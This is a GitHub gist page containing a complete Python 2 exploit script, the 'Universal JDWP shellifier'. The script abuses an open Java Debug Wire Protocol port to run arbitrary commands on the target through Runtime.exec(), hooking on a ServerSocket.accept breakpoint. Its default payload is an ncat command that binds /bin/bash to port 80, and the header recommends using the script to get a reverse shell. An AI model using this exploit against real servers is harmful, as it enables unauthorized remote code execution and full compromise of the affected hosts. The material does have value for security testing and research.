Skip to content

Instantly share code, notes, and snippets.

@hugsy
Created December 9, 2013 07:54
Show Gist options
  • Save hugsy/7868799 to your computer and use it in GitHub Desktop.
Save hugsy/7868799 to your computer and use it in GitHub Desktop.
Standalone script to universally execute command on an open JDWP service
##############################################################
#
# Universal JDWP shellifier
#
# References
# * http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp-spec.html
# * http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp/jdwp-protocol.html
#
# Note: this script DOES NOT read output from command executed on backend. You should
# only use it to create a reverse shell
#
import socket
import time
import sys
import struct
import urllib
# +-----------------+
# | change |
# | settings |
# +-----------------+
RHOST = "localhost" # ip/fqdn to the target
RPORT = 8000 # port
CMD = "ncat -e /bin/bash -l -p 80" # command to execute on remote host
BREAK_ON_CLASS = "Ljava/net/ServerSocket;" # class having the method to break on (default is fine)
BREAK_ON_METHOD = "accept" # method name to break on (default is fine)
################################################################################
#
# JDWP protocol variables
#
HANDSHAKE = "JDWP-Handshake"
REQUEST_PACKET_TYPE = 0x00
REPLY_PACKET_TYPE = 0x80
VERSION_SIG = (1, 1)
CLASSESBYSIGNATURE_SIG = (1, 2)
ALLCLASSES_SIG = (1, 3)
ALLTHREADS_SIG = (1, 4)
IDSIZES_SIG = (1, 7)
CREATESTRING_SIG = (1, 11)
SUSPENDVM_SIG = (1, 8)
RESUMEVM_SIG = (1, 9)
SIGNATURE_SIG = (2, 1)
FIELDS_SIG = (2, 4)
METHODS_SIG = (2, 5)
GETVALUES_SIG = (2, 6)
CLASSOBJECT_SIG = (2, 11)
INVOKESTATICMETHOD_SIG = (3, 3)
REFERENCETYPE_SIG = (9, 1)
INVOKEMETHOD_SIG = (9, 6)
STRINGVALUE_SIG = (10, 1)
THREADNAME_SIG = (11, 1)
THREADSUSPEND_SIG = (11, 2)
THREADRESUME_SIG = (11, 3)
THREADSTATUS_SIG = (11, 4)
EVENTSET_SIG = (15, 1)
EVENTCLEAR_SIG = (15, 2)
EVENTCLEARALL_SIG = (15, 3)
MODKIND_COUNT = 1
MODKIND_THREADONLY = 2
MODKIND_CLASSMATCH = 5
MODKIND_LOCATIONONLY = 7
EVENT_BREAKPOINT = 2
SUSPEND_EVENTTHREAD = 1
SUSPEND_ALL = 2
NOT_IMPLEMENTED = 99
VM_DEAD = 112
INVOKE_SINGLE_THREADED = 2
TAG_OBJECT = 76
TYPE_CLASS = 1
################################################################################
#
# JDWP client class
#
class JDWPClient:
def __init__(self):
self.methods = {}
self.fields = {}
self.id = 0x01
def create_packet(self, cmdsig, data=""):
flags = 0x00
cmdset, cmd = cmdsig
pktlen = len(data) + 11
pkt = struct.pack(">IIccc", pktlen, self.id, chr(flags), chr(cmdset), chr(cmd))
# print ">len:%#x \t id=%d \t flags=%#x \t cmdset=%x \t cmd=%x" % (pktlen, self.id, flags, cmdset, cmd)
pkt+= data
self.id += 2
return pkt
def read_reply(self):
header = self.socket.recv(11)
pktlen, id, flags, errcode = struct.unpack(">IIcH", header)
if flags == chr(REPLY_PACKET_TYPE):
# print "<len:%#x \t id=%d \t flags=%#x \t errcode=%d" % (pktlen, id, ord(flags), errcode)
if errcode :
raise Exception("Received errcode %d" % errcode)
buf = ""
while len(buf) + 11 < pktlen:
data = self.socket.recv(1024)
if len(data):
buf += data
else:
time.sleep(1)
return buf
def parse_entries(self, buf, formats, explicit=True):
entries = []
if explicit:
nb_entries = struct.unpack(">I", buf[:4])[0]
# print "[+] read %d entries" % nb_entries
buf = buf[4:]
else:
nb_entries = 1
for i in range(nb_entries):
data = {}
for fmt, name in formats:
if fmt == "L" or fmt == 8:
data[name] = int(struct.unpack(">Q", buf[:8])[0])
buf = buf[8:]
elif fmt == "I" or fmt == 4:
data[name] = int(struct.unpack(">I", buf[:4])[0])
buf = buf[4:]
elif fmt == 'S':
l = struct.unpack(">I", buf[:4])[0]
data[name] = buf[4:4+l]
buf = buf[4+l:]
elif fmt == 'C':
data[name] = ord(struct.unpack(">c", buf[:1])[0])
buf = buf[1:]
elif fmt == 'Z': # zpecifics
t = ord(struct.unpack(">c", buf[:1])[0])
if t == 115: # string (objid)
s = self.solve_string(buf[1:9])
data[name] = s
buf = buf[9:]
elif t == 73: # int
data[name] = struct.unpack(">I", buf[1:5])[0]
buf = struct.unpack(">I", buf[5:9])
# todo other type if time
else:
print "Error"
exit(1)
entries.append( data )
return entries
def format(self, fmt, value):
if fmt == "L" or fmt == 8:
return struct.pack(">Q", value)
elif fmt == "I" or fmt == 4:
return struct.pack(">I", value)
else:
raise Exception("Unknown format")
def unformat(self, fmt, value):
if fmt == "L" or fmt == 8:
return struct.unpack(">Q", value[:8])[0]
elif fmt == "I" or fmt == 4:
return struct.unpack(">I", value[:4])[0]
else:
raise Exception("Unknown format")
def start(self, host, port):
self.handshake(host, port)
self.idsizes()
self.getversion()
self.allclasses()
# self.allthreads() # not used, faster
def handshake(self, host, port):
s = socket.socket()
s.connect( (host, port) )
s.send( HANDSHAKE )
if s.recv( len(HANDSHAKE) ) != HANDSHAKE:
raise Exception("failed to handshake")
else:
# print "[+] connected"
self.socket = s
return
def leave(self):
self.socket.close()
return
def getversion(self):
self.socket.sendall( self.create_packet(VERSION_SIG) )
buf = self.read_reply()
formats = [ ('S', "description"), ('I', "jdwpMajor"), ('I', "jdwpMinor"),
('S', "vmVersion"), ('S', "vmName"), ]
for entry in self.parse_entries(buf, formats, False):
for name,value in entry.iteritems():
setattr(self, name, value)
return
@property
def version(self):
return "%s - %s" % (self.vmName, self.vmVersion)
def idsizes(self):
self.socket.sendall( self.create_packet(IDSIZES_SIG) )
buf = self.read_reply()
formats = [ ("I", "fieldIDSize"), ("I", "methodIDSize"), ("I", "objectIDSize"),
("I", "referenceTypeIDSize"), ("I", "frameIDSize") ]
for entry in self.parse_entries(buf, formats, False):
for name,value in entry.iteritems():
setattr(self, name, value)
# print name, " ", value
return
def allthreads(self):
try:
getattr(self, "threads")
except :
self.socket.sendall( self.create_packet(ALLTHREADS_SIG) )
buf = self.read_reply()
formats = [ (self.objectIDSize, "threadId")]
self.threads = self.parse_entries(buf, formats)
finally:
return self.threads
def get_thread_by_name(self, name):
self.allthreads()
for t in self.threads:
threadId = self.format(self.objectIDSize, t["threadId"])
self.socket.sendall( self.create_packet(THREADNAME_SIG, data=threadId) )
buf = self.read_reply()
if len(buf) and name == self.readstring(buf):
return t
return None
def allclasses(self):
try:
getattr(self, "classes")
except:
self.socket.sendall( self.create_packet(ALLCLASSES_SIG) )
buf = self.read_reply()
formats = [ ('C', "refTypeTag"),
(self.referenceTypeIDSize, "refTypeId"),
('S', "signature"),
('I', "status")]
self.classes = self.parse_entries(buf, formats)
finally:
return self.classes
return
def get_class_by_name(self, name):
for entry in self.classes:
if entry["signature"].lower() == name.lower() :
return entry
return None
def get_methods(self, refTypeId):
if not self.methods.has_key(refTypeId):
refId = self.format(self.referenceTypeIDSize, refTypeId)
self.socket.sendall( self.create_packet(METHODS_SIG, data=refId) )
buf = self.read_reply()
formats = [ (self.methodIDSize, "methodId"),
('S', "name"),
('S', "signature"),
('I', "modBits")]
self.methods[refTypeId] = self.parse_entries(buf, formats)
return self.methods[refTypeId]
def get_method_by_name(self, name):
for refId in self.methods.keys():
for entry in self.methods[refId]:
if entry["name"].lower() == name.lower() :
return entry
return None
def getfields(self, refTypeId):
if not self.fields.has_key( refTypeId ):
refId = self.format(self.referenceTypeIDSize, refTypeId)
self.socket.sendall( self.create_packet(FIELDS_SIG, data=refId) )
buf = self.read_reply()
formats = [ (self.fieldIDSize, "fieldId"),
('S', "name"),
('S', "signature"),
('I', "modbits")]
self.fields[refTypeId] = self.parse_entries(buf, formats)
return self.fields[refTypeId]
def getvalue(self, refTypeId, fieldId):
data = self.format(self.referenceTypeIDSize, refTypeId)
data+= struct.pack(">I", 1)
data+= self.format(self.fieldIDSize, fieldId)
self.socket.sendall( self.create_packet(GETVALUES_SIG, data=data) )
buf = self.read_reply()
formats = [ ("Z", "value") ]
field = self.parse_entries(buf, formats)[0]
return field
def createstring(self, data):
buf = self.buildstring(data)
self.socket.sendall( self.create_packet(CREATESTRING_SIG, data=buf) )
buf = self.read_reply()
return self.parse_entries(buf, [(self.objectIDSize, "objId")], False)
def buildstring(self, data):
return struct.pack(">I", len(data)) + data
def readstring(self, data):
size = struct.unpack(">I", data[:4])[0]
# print "string size is %d" % size
return data[4:4+size]
def suspendvm(self):
self.socket.sendall( self.create_packet( SUSPENDVM_SIG ) )
self.read_reply()
return
def resumevm(self):
self.socket.sendall( self.create_packet( RESUMEVM_SIG ) )
self.read_reply()
return
def invokestatic(self, classId, threadId, methId, objId=None, *args):
data = self.format(self.referenceTypeIDSize, classId)
data+= self.format(self.objectIDSize, threadId)
data+= self.format(self.methodIDSize, methId)
data+= struct.pack(">I", len(args))
for arg in args:
data+= arg
data+= struct.pack(">I", 0)
self.socket.sendall( self.create_packet(INVOKESTATICMETHOD_SIG, data=data) )
buf = self.read_reply()
return buf
def invoke(self, objId, threadId, classId, methId, *args):
data = self.format(self.objectIDSize, objId)
data+= self.format(self.objectIDSize, threadId)
data+= self.format(self.referenceTypeIDSize, classId)
data+= self.format(self.methodIDSize, methId)
data+= struct.pack(">I", len(args))
for arg in args:
data+= arg
data+= struct.pack(">I", 0)
self.socket.sendall( self.create_packet(INVOKEMETHOD_SIG, data=data) )
buf = self.read_reply()
return buf
def solve_string(self, objId):
self.socket.sendall( self.create_packet(STRINGVALUE_SIG, data=objId) )
buf = self.read_reply()
if len(buf):
return self.readstring(buf)
else:
return ""
def query_thread(self, threadId, kind):
data = self.format(self.objectIDSize, threadId)
self.socket.sendall( self.create_packet(kind, data=data) )
buf = self.read_reply()
return
def suspend_thread(self, threadId):
return self.query_thread(threadId, THREADSUSPEND_SIG)
def status_thread(self, threadId):
return self.query_thread(threadId, THREADSTATUS_SIG)
def resume_thread(self, threadId):
return self.query_thread(threadId, THREADRESUME_SIG)
def send_event(self, eventCode, *args):
data = ""
data+= chr( eventCode )
data+= chr( SUSPEND_ALL )
data+= struct.pack(">I", len(args))
for kind, option in args:
data+= chr( kind )
data+= option
self.socket.sendall( self.create_packet(EVENTSET_SIG, data=data) )
buf = self.read_reply()
return struct.unpack(">I", buf)[0]
def clear_event(self, eventCode, rId):
data = chr(eventCode)
data+= struct.pack(">I", rId)
self.socket.sendall( self.create_packet(EVENTCLEAR_SIG, data=data) )
self.read_reply()
return
def clear_events(self):
self.socket.sendall( self.create_packet(EVENTCLEARALL_SIG) )
self.read_reply()
return
def wait_for_event(self):
buf = self.read_reply()
return buf
def parse_event_breakpoint(self, buf, eventId):
num = struct.unpack(">I", buf[2:6])[0]
rId = struct.unpack(">I", buf[6:10])[0]
if rId != eventId:
return None
tId = self.unformat(self.objectIDSize, buf[10:10+self.objectIDSize])
loc = -1 # don't care
return rId, tId, loc
def runtime_exec(cli, cmd):
print "[+] Reading settings for '%s'" % cli.version
# 1. allocating string containing our command to exec()
cmdObjIds = cli.createstring(cmd)
if len(cmdObjIds) == 0:
print "[-] failed to allocate command"
return False
cmdObjId = cmdObjIds[0]["objId"]
print "[+] command string object created id:%x" % cmdObjId
# 2. get Runtime class reference
clazz = cli.get_class_by_name("Ljava/lang/Runtime;")
if clazz is None:
print "[-] cannot find class Runtime"
return False
print "[+] found Runtime class: id=%x" % clazz["refTypeId"]
# 3. get getRuntime() meth reference
cli.get_methods(clazz["refTypeId"])
meth = cli.get_method_by_name("getRuntime")
if meth is None:
print "[-] cannot find method getRuntime"
return False
print "[+] found getRuntime: id=%x" % meth["methodId"]
# 4. setup breakpoint on frequently called method
c = cli.get_class_by_name(BREAK_ON_CLASS)
cli.get_methods( c["refTypeId"] )
m = cli.get_method_by_name(BREAK_ON_METHOD)
loc = chr( TYPE_CLASS )
loc+= cli.format( cli.referenceTypeIDSize, c["refTypeId"] )
loc+= cli.format( cli.methodIDSize, m["methodId"] )
loc+= struct.pack(">II", 0, 0)
data = [ (MODKIND_LOCATIONONLY, loc), ]
rId = cli.send_event( EVENT_BREAKPOINT, *data )
print "[+] created break event id=%x" % rId
# 5. resume vm and wait for event
cli.resumevm()
print "[+] waiting for a matching event"
while True:
buf = cli.wait_for_event()
ret = cli.parse_event_breakpoint(buf, rId)
if ret is not None:
break
rId, tId, loc = ret
print "[+] received matching event from thread %#x" % tId
# 6. use context to get Runtime object
buf = cli.invokestatic(clazz["refTypeId"], tId, meth["methodId"])
if buf[0] != chr(TAG_OBJECT):
print "[-] Unexpected returned type"
return False
rt = cli.unformat(cli.objectIDSize, buf[1:1+cli.objectIDSize])
cli.clear_event(EVENT_BREAKPOINT, rId)
if rt is None:
print "[-] failed to invoke Runtime.getRuntime()"
return False
print "[+] got runtime context id:%#x" % rt
# 7. find exec() method
meth = cli.get_method_by_name("exec")
if meth is None:
print "[-] cannot find method exec"
return False
print "[+] found exec: id=%x" % meth["methodId"]
# 8. call exec() in this context with the alloc-ed string
data = [ chr(TAG_OBJECT) + cli.format(cli.objectIDSize, cmdObjId) ]
buf = cli.invoke(rt, tId, clazz["refTypeId"], meth["methodId"], *data)
if buf[0] != chr(TAG_OBJECT):
print "[-] Unexpected returned type"
return False
print "[+] Invoking exec() successful, retId=%x" % cli.unformat(cli.objectIDSize, buf[1:1+cli.objectIDSize])
cli.resumevm()
print "[+] Command successfully executed"
return True
if __name__ == "__main__":
retcode = 0
cli = JDWPClient()
try:
cli.start(RHOST, RPORT)
if runtime_exec(cli, CMD) == False:
print "[-] Exploit failed"
retcode = 1
except KeyboardInterrupt:
pass
except Exception, e:
print "[-] Exception: %s" % e
retcode = 1
finally:
cli.leave()
exit(retcode)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment